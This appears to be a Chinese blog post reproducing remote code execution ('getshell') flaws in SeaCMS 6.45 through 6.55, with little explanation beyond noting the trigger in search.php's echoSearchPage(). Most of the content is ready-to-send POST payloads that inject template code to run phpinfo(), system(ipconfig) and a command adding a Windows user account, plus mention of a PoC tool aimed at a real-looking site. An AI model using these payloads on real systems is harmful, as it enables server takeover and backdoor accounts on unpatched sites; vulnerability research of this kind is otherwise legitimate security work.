海洋CMS6.45前台getshell漏洞

前台:http://127.0.0.1/CMS/seacms_v6.4/upload/

后台:

http://127.0.0.1/CMS/seacms_v6.4/upload/admin/login.php?gotopage=%2Fseacms%28v6.53%29%2Fupload%2Fadmin%2F

Seacms漏洞

Seacms漏洞

Seacms漏洞

复现结果:

http://127.0.0.1/CMS/seacms_v6.4/upload/search.php

post:searchtype=5&order=}{end if} {if:1)phpinfo();if(1}{end if}

Seacms漏洞

1.漏洞的触发点是在search.php 中的echoSearchPage()函数可以触发漏洞。常规的分析都是先找GETPOST的位置,在这个文件里面没有这些变量,原来是在./include/common.php里面。

Seacms漏洞

Seacms漏洞

Seacms漏洞

Seacms漏洞

海洋CMS 6.54

Seacms漏洞6.54

searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=ph&9[]=pinfo();


POST::

searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=ph&9[]=pinfo();

Seacms漏洞


命令执行:

searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=sy&9[]=stem(ipconfig);

searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=sy&9[]=stem(ipconfig);


Seacms漏洞

searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=sy&9[]=stem("net user 123 123 /add");

Seacms漏洞

海洋CMS V6.55

Seacms漏洞

Seacms漏洞

Seacms漏洞

Seacms漏洞

使用cmsPoc:

Seacms漏洞

http://www.70vx.com/index.php

修复了漏洞

Seacms漏洞

寻找其他漏洞点


参考:

freebuf V6.54 6.55 

i春秋作者的代码审计



相关文章:

  • 2020-05-15
  • 2019-03-19
  • 2021-11-23
  • 2022-01-05
  • 2022-12-23
猜你喜欢
  • 2022-01-28
  • 2022-12-23
  • 2021-10-29
  • 2021-10-09
  • 2022-12-23
  • 2021-12-02
相关资源
相似解决方案